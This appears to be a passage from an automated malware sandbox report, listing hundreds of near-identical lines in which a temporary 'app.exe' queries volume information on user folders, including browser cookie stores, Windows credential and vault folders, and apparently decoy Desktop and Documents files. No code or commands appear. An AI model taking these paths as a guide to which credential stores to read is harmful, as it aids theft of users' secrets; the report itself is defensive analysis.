Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Intel VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Mozilla VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\VirtualStore VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow\Adobe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow\Intel VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow\Microsoft VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow\Mozilla VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Sun VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Flash Player VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Headlights VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Linguistics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\LogTransport2 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\AddIns VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Credentials VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Excel VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\MMC VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Network VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Protect VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Vault VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\SystemExtensionsDev VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Sun\Java VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Contacts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Contacts\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Contacts\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\IVHSHTCODI VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\JDSOXXXWOA VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Word.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Word.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\FACWLRWHGG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\FACWLRWHGG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI.jpg VolumeInformationJump to behavior
